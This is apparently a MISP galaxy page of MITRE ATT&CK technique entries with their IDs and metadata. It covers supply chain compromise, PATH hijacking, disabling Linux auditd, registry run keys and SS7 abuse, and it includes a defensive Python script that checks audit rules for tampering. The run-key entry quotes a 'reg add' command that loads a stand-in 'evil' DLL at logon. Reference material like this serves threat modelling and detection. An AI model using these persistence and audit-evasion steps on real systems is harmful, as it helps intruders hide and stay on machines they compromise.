Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.

Internal MISP references

UUID 191cc6af-1bb2-4344-ab5f-28e496638720 which can be used as unique global reference for Compromise Software Dependencies and Development Tools - T1195.001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1195.001
kill_chain ['attack-Linux:initial-access', 'attack-macOS:initial-access', 'attack-Windows:initial-access']
mitre_data_sources ['File: File Metadata']
mitre_platforms ['Linux', 'macOS', 'Windows']
Related clusters

Windows File and Directory Permissions Modification - T1222.001

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, a DACL identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)

Adversaries can interact with the DACLs using built-in Windows commands, such as icacls, cacls, takeown, and attrib, which can grant adversaries higher permissions on specific files and folders. Further, PowerShell provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.

Internal MISP references

UUID 34e793de-0274-4982-9c1a-246ed1c19dee which can be used as unique global reference for Windows File and Directory Permissions Modification - T1222.001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1222.001
kill_chain ['attack-Windows:defense-evasion']
mitre_data_sources ['Active Directory: Active Directory Object Modification', 'Command: Command Execution', 'File: File Metadata', 'Process: Process Creation']
mitre_platforms ['Windows']
Related clusters

Compromise Software Dependencies and Development Tools - T1474.001

Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Grace-Advertisement)

Internal MISP references

UUID 7827ced0-95e7-4d05-bdcf-0d8f2d37a3d3 which can be used as unique global reference for Compromise Software Dependencies and Development Tools - T1474.001 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1474.001
kill_chain ['mobile-attack-Android:initial-access', 'mobile-attack-iOS:initial-access']
mitre_platforms ['Android', 'iOS']
Related clusters

Path Interception by PATH Environment Variable - T1574.007

Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line.

Adversaries can place a malicious program in an earlier entry in the list of directories stored in the PATH environment variable, resulting in the operating system executing the malicious binary rather than the legitimate binary when it searches sequentially through that PATH listing.

For example, on Windows if an adversary places a malicious program named "net.exe" in C:\example path, which by default precedes C:\Windows\system32\net.exe in the PATH environment variable, when "net" is executed from the command-line the C:\example path will be called instead of the system's legitimate executable at C:\Windows\system32\net.exe. Some methods of executing a program rely on the PATH environment variable to determine the locations that are searched when the path for the program is not given, such as executing programs from a Command and Scripting Interpreter.(Citation: ExpressVPN PATH env Windows 2021)

Adversaries may also directly modify the $PATH variable specifying the directories to be searched. An adversary can modify the $PATH variable to point to a directory to which they have write access. When a program using the $PATH variable is called, the OS searches the specified directory and executes the malicious binary. On macOS, this can also be performed through modifying the $HOME variable. These variables can be modified using the command line, launchctl, Unix Shell Configuration Modification, or modifying the /etc/paths.d folder contents.(Citation: uptycs Fake POC linux malware 2023)(Citation: nixCraft macOS PATH variables)(Citation: Elastic Rules macOS launchctl 2022)

Internal MISP references

UUID 0c2d00da-7742-49e7-9928-4514e5075d32 which can be used as unique global reference for Path Interception by PATH Environment Variable - T1574.007 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1574.007
kill_chain ['attack-Windows:persistence', 'attack-macOS:persistence', 'attack-Linux:persistence', 'attack-Windows:privilege-escalation', 'attack-macOS:privilege-escalation', 'attack-Linux:privilege-escalation', 'attack-Windows:defense-evasion', 'attack-macOS:defense-evasion', 'attack-Linux:defense-evasion']
mitre_data_sources ['File: File Creation', 'Process: Process Creation', 'Windows Registry: Windows Registry Key Modification']
mitre_platforms ['Windows', 'macOS', 'Linux']
Related clusters

Path Interception by Search Order Hijacking - T1574.008

Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.

Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike DLL Search Order Hijacking, the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.

For example, "example.exe" runs "cmd.exe" with the command-line argument net user. If an adversary places a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)

Search order hijacking is also a common practice for hijacking DLL loads and is covered in DLL Search Order Hijacking.

Internal MISP references

UUID 58af3705-8740-4c68-9329-ec015a7013c2 which can be used as unique global reference for Path Interception by Search Order Hijacking - T1574.008 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1574.008
kill_chain ['attack-Windows:persistence', 'attack-Windows:privilege-escalation', 'attack-Windows:defense-evasion']
mitre_data_sources ['File: File Creation', 'File: File Modification', 'Process: Process Creation']
mitre_platforms ['Windows']
Related clusters

Disable or Modify Linux Audit System - T1562.012

Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux administrators use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules.

The system is often referred to as auditd, the name of the daemon that writes events to disk; the daemon is governed by the parameters set in the audit.conf configuration file. The two primary ways to configure the log generation rules are the command-line auditctl utility and the file /etc/audit/audit.rules, which contains a sequence of auditctl commands loaded at boot time.(Citation: Red Hat System Auditing)(Citation: IzyKnows auditd threat detection 2022)

With root privileges, adversaries may be able to ensure their activity is not logged by disabling the Audit system service, editing the configuration/rule files, or hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service by killing processes associated with the auditd daemon or by using systemctl to stop the Audit service. Adversaries can also hook Audit system functions to disable logging, or modify the rules contained in the /etc/audit/audit.rules or audit.conf files to ignore malicious activity.(Citation: Trustwave Honeypot SkidMap 2023)(Citation: ESET Ebury Feb 2014)
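Because the rule files and the `-e` state are the places this technique touches, a defender's first check is whether the loaded rules still match a known-good baseline. The following is an added example written for this page, not MISP or ATT&CK code: it parses two rule sets in the /etc/audit/audit.rules format, reports watches that disappeared, reports rules that suppress events (action `never` or the exclude list) that appeared, and reports whether the configuration is still locked with `-e 2` (auditctl's immutable mode, which can only be changed by a reboot). Both rule sets, and the paths and keys inside them, are constructed for illustration.

```python
"""Detect drift in Linux Audit rules relative to a known-good baseline.

Added example (not MISP/ATT&CK code). BASELINE_RULES and CURRENT_RULES are
constructed in the /etc/audit/audit.rules format; in practice the current
set would come from that file or from `auditctl -l`.
"""
from typing import List, Optional, Tuple

# Constructed known-good rule set: watches on identity and audit config files,
# an execve syscall rule, and the configuration locked with -e 2.
BASELINE_RULES = """
-D
-b 8192
-w /etc/passwd -p wa -k identity
-w /etc/audit/ -p wa -k audit-config
-a always,exit -F arch=b64 -S execve -k exec
-e 2
"""

# Constructed tampered copy: the audit-config watch is gone, an exclusion
# rule was added, and the immutable flag was downgraded to -e 1.
CURRENT_RULES = """
-D
-b 8192
-w /etc/passwd -p wa -k identity
-a always,exit -F arch=b64 -S execve -k exec
-a never,exit -F arch=b64 -S execve -F exe=/tmp/example -k noop
-e 1
"""


def parse_rules(text: str) -> List[str]:
    """Drop comments and blank lines and normalise whitespace so rules compare as text."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            rules.append(" ".join(line.split()))
    return rules


def enabled_flag(rules: List[str]) -> Optional[str]:
    """Return the last `-e` value seen (0 disabled, 1 enabled, 2 locked), or None."""
    flag = None
    for rule in rules:
        if rule.startswith("-e "):
            flag = rule.split()[1]
    return flag


def is_exclusion(rule: str) -> bool:
    """True for rules that suppress events: action `never` or the exclude list."""
    parts = rule.split()
    if len(parts) < 2 or parts[0] != "-a":
        return False
    action = parts[1]
    return action.startswith("never,") or action.startswith("exclude,") or action.endswith(",exclude")


def assess(baseline_text: str, current_text: str) -> List[Tuple[str, str]]:
    """Return (category, detail) findings describing drift from the baseline."""
    baseline = [r for r in parse_rules(baseline_text) if not r.startswith("-e ")]
    current_all = parse_rules(current_text)
    current = [r for r in current_all if not r.startswith("-e ")]
    findings: List[Tuple[str, str]] = []

    flag = enabled_flag(current_all)
    if flag == "0":
        findings.append(("disabled", "auditing turned off with -e 0"))
    elif flag != "2":
        shown = f"-e {flag}" if flag is not None else "no -e line"
        findings.append(("not_locked", f"rules are not immutable ({shown}, expected -e 2)"))

    for rule in baseline:
        if rule not in current:
            findings.append(("rule_removed", rule))
    for rule in current:
        if rule not in baseline:
            findings.append(("exclusion_added" if is_exclusion(rule) else "rule_added", rule))
    return findings


if __name__ == "__main__":
    for category, detail in assess(BASELINE_RULES, CURRENT_RULES):
        print(f"{category}: {detail}")
```

Comparing against a baseline rather than scanning for "bad" rules keeps the check independent of what an intruder might add; a rule that exists only to suppress events is still called out separately because it is the change most likely to be missed in a plain diff.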

Internal MISP references

UUID 562e9b64-7239-493d-80f4-2bff900d9054 which can be used as unique global reference for Disable or Modify Linux Audit System - T1562.012 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1562.012
kill_chain ['attack-Linux:defense-evasion']
mitre_data_sources ['Command: Command Execution', 'File: File Deletion', 'File: File Modification', 'Process: OS API Execution', 'Process: Process Modification']
mitre_platforms ['Linux']
Related clusters

Registry Run Keys / Startup Folder - T1060

Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.

Placing a program within a startup folder will cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in.

The startup folder path for the current user is:

  • C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

The startup folder path for all users is:

  • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

The following run keys are created by default on Windows systems:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)

The following Registry keys can be used to set startup folder items for persistence:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

The following Registry keys can control automatic startup of services during boot:

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices

Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs.

Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on.

By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.

Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.

Internal MISP references

UUID 9422fc14-1c43-410d-ab0f-a709b76c72dc which can be used as unique global reference for Registry Run Keys / Startup Folder - T1060 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1060
kill_chain ['attack-Windows:persistence']
mitre_platforms ['Windows']
Related clusters

Exploit SS7 to Redirect Phone Calls/SMS - T1449

An adversary could exploit signaling system vulnerabilities to redirect calls or text messages (SMS) to a phone number under the attacker's control. The adversary could then act as an adversary-in-the-middle to intercept or manipulate the communication. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport) Interception of SMS messages could enable adversaries to obtain authentication codes used for multi-factor authentication.(Citation: TheRegister-SS7)

Internal MISP references

UUID fb3fa94a-3aee-4ab0-b7e7-abdf0a51286d which can be used as unique global reference for Exploit SS7 to Redirect Phone Calls/SMS - T1449 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1449
kill_chain ['mobile-attack-Android:network-effects', 'mobile-attack-iOS:network-effects']
mitre_platforms ['Android', 'iOS']

Assess security posture of physical locations - T1302

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Physical access may be required for certain types of adversarial actions. (Citation: CyberPhysicalAssessment) (Citation: CriticalInfrastructureAssessment)

Internal MISP references

UUID 31a57c70-6709-4d06-a473-c3df1f74c1d4 which can be used as unique global reference for Assess security posture of physical locations - T1302 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1302
kill_chain ['pre-attack:organizational-weakness-identification']

Determine domain and IP address space - T1250

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Domain Names are the human readable names used to represent one or more IP addresses. IP addresses are the unique identifier of computing devices on a network. Both pieces of information are valuable to an adversary who is looking to understand the structure of a network. (Citation: RSA-APTRecon)

Internal MISP references

UUID 23ecb7e0-0340-43d9-80a5-8971fe866ddf which can be used as unique global reference for Determine domain and IP address space - T1250 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1250
kill_chain ['pre-attack:technical-information-gathering']

Research visibility gap of security vendors - T1290

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

If an adversary can identify which security tools a victim is using they may be able to identify ways around those tools. (Citation: CrowdStrike Putter Panda)

Internal MISP references

UUID b26babc7-9127-4bd5-9750-5e49748c9be3 which can be used as unique global reference for Research visibility gap of security vendors - T1290 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1290
kill_chain ['pre-attack:technical-weakness-identification']

Exploit SS7 to Track Device Location - T1450

An adversary could exploit signaling system vulnerabilities to track the location of mobile devices. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport)

Internal MISP references

UUID 52651225-0b3a-482d-aa7e-10618fd063b5 which can be used as unique global reference for Exploit SS7 to Track Device Location - T1450 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1450
kill_chain ['mobile-attack-Android:network-effects', 'mobile-attack-iOS:network-effects']
mitre_platforms ['Android', 'iOS']
Related clusters

Access Sensitive Data in Device Logs - T1413

On versions of Android prior to 4.1, an adversary may use a malicious application that holds the READ_LOGS permission to obtain private keys, passwords, other credentials, or other sensitive data stored in the device's system log. On Android 4.1 and later, an adversary would need to attempt to perform an operating system privilege escalation attack to be able to access the log.

Internal MISP references

UUID 29e07491-8947-43a3-8d4e-9a787c45f3d3 which can be used as unique global reference for Access Sensitive Data in Device Logs - T1413 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1413
kill_chain ['mobile-attack-Android:collection', 'mobile-attack-Android:credential-access']
mitre_platforms ['Android']

Stolen Developer Credentials or Signing Keys - T1441

An adversary could steal developer account credentials on an app store and/or signing keys to publish malicious updates to existing Android or iOS apps, or to abuse the developer's identity and reputation to publish new malicious applications. For example, Infoworld describes this technique and suggests mitigations in (Citation: Infoworld-Appstore).

Detection: Developers can regularly scan (or have a third party scan on their behalf) the app stores for presence of unauthorized apps that were submitted using the developer's identity.

Platforms: Android, iOS

Internal MISP references

UUID a21a6a79-f9a1-4c87-aed9-ba2d79536881 which can be used as unique global reference for Stolen Developer Credentials or Signing Keys - T1441 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1441

Component Object Model and Distributed COM - T1175

This technique has been deprecated. Please use Distributed Component Object Model and Component Object Model.

Adversaries may use the Windows Component Object Model (COM) and Distributed Component Object Model (DCOM) for local code execution or to execute on remote systems as part of lateral movement.

COM is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) DCOM is transparent middleware that extends the functionality of Component Object Model (COM) (Citation: Microsoft COM) beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)

Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. (Citation: Microsoft COM ACL)(Citation: Microsoft Process Wide Com Keys)(Citation: Microsoft System Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.

Adversaries may abuse COM for local command and/or payload execution. Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and VBScript.(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a Scheduled Task/Job, fileless download/execution, and other adversary behaviors such as Privilege Escalation and Persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)

Adversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications (Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents (Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application (Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.

Internal MISP references

UUID 772bc7a8-a157-42cc-8728-d648e25c7fe7 which can be used as unique global reference for Component Object Model and Distributed COM - T1175 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1175
kill_chain ['attack-Windows:lateral-movement', 'attack-Windows:execution']
mitre_platforms ['Windows']

Develop social network persona digital footprint - T1342

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Both newly built personas and pre-compromised personas may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage) (Citation: RobinSageInterview)

Internal MISP references

UUID 271e6d40-e191-421a-8f87-a8102452c201 which can be used as unique global reference for Develop social network persona digital footprint - T1342 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1342
kill_chain ['pre-attack:persona-development']

Assess vulnerability of 3rd party vendors - T1298

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Once a 3rd party vendor has been identified as being of interest, it can be probed for vulnerabilities just like the main target would be. (Citation: Zetter2015Threats) (Citation: WSJTargetBreach)

Internal MISP references

UUID 1def484d-2343-470d-8925-88f45b5f9615 which can be used as unique global reference for Assess vulnerability of 3rd party vendors - T1298 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1298
kill_chain ['pre-attack:organizational-weakness-identification']

Manipulate App Store Rankings or Ratings - T1452

An adversary could use access to a compromised device's credentials to attempt to manipulate app store rankings or ratings by triggering application downloads or posting fake reviews of applications. This technique likely requires privileged access (a rooted or jailbroken device).

Internal MISP references

UUID 76c12fc8-a4eb-45d6-a3b7-e371a7248f69 which can be used as unique global reference for Manipulate App Store Rankings or Ratings - T1452 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1452
kill_chain ['mobile-attack-Android:impact', 'mobile-attack-iOS:impact']
mitre_platforms ['Android', 'iOS']

Acquire OSINT data sets and information - T1247

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered online, such as from search engines, as well as in the physical world. (Citation: RSA-APTRecon)

Internal MISP references

UUID 784ff1bc-1483-41fe-a172-4cd9ae25c06b which can be used as unique global reference for Acquire OSINT data sets and information - T1247 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1247
kill_chain ['pre-attack:technical-information-gathering']

Acquire OSINT data sets and information - T1266

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Open source intelligence (OSINT) provides free, readily available information about a target while providing the target no indication they are of interest. Such information can assist an adversary in crafting a successful approach for compromise. (Citation: RSA-APTRecon)

Internal MISP references

UUID 2b9a666e-bd59-4f67-9031-ed41b428e04a which can be used as unique global reference for Acquire OSINT data sets and information - T1266 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1266
kill_chain ['pre-attack:people-information-gathering']

Acquire OSINT data sets and information - T1277

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Data sets can be anything from Securities and Exchange Commission (SEC) filings to public phone numbers. Many datasets are now either publicly available for free or can be purchased from a variety of data vendors. Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered online as well as in the physical world. (Citation: SANSThreatProfile) (Citation: Infosec-osint) (Citation: isight-osint)

Internal MISP references

UUID 028ad431-84c5-4eb7-a364-2b797c234f88 which can be used as unique global reference for Acquire OSINT data sets and information - T1277 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1277
kill_chain ['pre-attack:organizational-information-gathering']

Assess opportunities created by business deals - T1299

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

During mergers, divestitures, or other periods of change in joint infrastructure or business processes there may be an opportunity for exploitation. During this type of churn, unusual requests or other non-standard practices may not be as noticeable. (Citation: RossiMergers) (Citation: MeidlHealthMergers)

Internal MISP references

UUID e2aa077d-60c9-4de5-b015-a9c382877cd9 which can be used as unique global reference for Assess opportunities created by business deals - T1299 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1299
kill_chain ['pre-attack:organizational-weakness-identification']

SSL certificate acquisition for trust breaking - T1338

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Fake certificates can be acquired by legal process or coercion, or an adversary can trick a Certificate Authority into issuing a certificate. These fake certificates can be used as a part of Man-in-the-Middle attacks. (Citation: SubvertSSL)

Internal MISP references

UUID 54a42187-a20c-4e4e-ba31-8d15c9e1f57f which can be used as unique global reference for SSL certificate acquisition for trust breaking - T1338 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1338
kill_chain ['pre-attack:establish-&-maintain-infrastructure']

Identify resources required to build capabilities - T1348

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

As with legitimate development efforts, different skill sets may be required for different phases of an attack. The skills needed may be located in-house, can be developed, or may need to be contracted out. (Citation: APT1)

Internal MISP references

UUID c9fb4451-729d-4771-b205-52c1829f949c which can be used as unique global reference for Identify resources required to build capabilities - T1348 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1348
kill_chain ['pre-attack:build-capabilities']

Hardware or software supply chain implant - T1365

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

During production and distribution, an adversary may place software, firmware, or a CPU chip in a computer, handheld, or other electronic device that enables the adversary to gain illegal entry. (Citation: McDRecall) (Citation: SeagateMaxtor)

Internal MISP references

UUID 388f3a5c-2cdd-466c-9159-b507fa429fcd which can be used as unique global reference for Hardware or software supply chain implant - T1365 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1365
kill_chain ['pre-attack:stage-capabilities']

Test malware in various execution environments - T1357

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Malware may perform differently on different platforms (computer vs handheld), different operating systems (Ubuntu vs OS X), and different versions (Windows 7 vs 10), so malicious actors will test their malware in the environment(s) where they most expect it to be executed. (Citation: BypassMalwareDefense)

Internal MISP references

UUID e042a41b-5ecf-4f3a-8f1f-1b528c534772 which can be used as unique global reference for Test malware in various execution environments - T1357 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1357
kill_chain ['pre-attack:test-capabilities']

Conduct social engineering or HUMINT operation - T1376

This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.

Social Engineering is the practice of manipulating people in order to get them to divulge information or take an action. Human Intelligence (HUMINT) is intelligence collected and provided by human sources. (Citation: 17millionScam) (Citation: UbiquityEmailScam)

Internal MISP references

UUID b79a1960-d0be-4b51-bb62-b27e91e1dea0 which can be used as unique global reference for Conduct social engineering or HUMINT operation - T1376 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1376
kill_chain ['pre-attack:launch']

Spear phishing messages with malicious attachments - T1367

This technique has been deprecated. Please use Spearphishing Attachment.

Emails with malicious attachments are designed to get a user to open/execute the attachment in order to deliver malware payloads. (Citation: APT1)

Internal MISP references

UUID e24a9f99-cb76-42a3-a50b-464668773e97 which can be used as unique global reference for Spear phishing messages with malicious attachments - T1367 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1367
kill_chain ['pre-attack:launch']

Authorized user performs requested cyber action - T1386

This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.

Clicking on links in email, opening attachments, or visiting websites that result in drive-by downloads can all result in compromise due to users performing actions of a cyber nature. (Citation: AnonHBGary)

Internal MISP references

UUID 0440f60f-9056-4791-a740-8eae96eb61fa which can be used as unique global reference for Authorized user performs requested cyber action - T1386 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1386
kill_chain ['pre-attack:compromise']

Spear phishing messages with text only - T1368

This technique has been deprecated. Please use Phishing where appropriate.

Emails with text-only phishing messages do not contain any attachments or links to websites. They are designed to get a user to take a follow-on action such as calling a phone number or wiring money. They can also be used to elicit an email response to confirm the existence of an account or user. (Citation: Paypal Phone Scam)

Internal MISP references

UUID 2fc04aa5-48c1-49ec-919a-b88241ef1d17 which can be used as unique global reference for Spear phishing messages with text only - T1368 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1368
kill_chain ['pre-attack:launch']

Spear phishing messages with malicious links - T1369

This technique has been deprecated. Please use Spearphishing Link.

Emails with malicious links are designed to get a user to click on the link in order to deliver malware payloads. (Citation: GoogleDrive Phishing) (Citation: RSASEThreat)

Internal MISP references

UUID 489a7797-01c3-4706-8cd1-ec56a9db3adc which can be used as unique global reference for Spear phishing messages with malicious links - T1369 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1369
kill_chain ['pre-attack:launch']

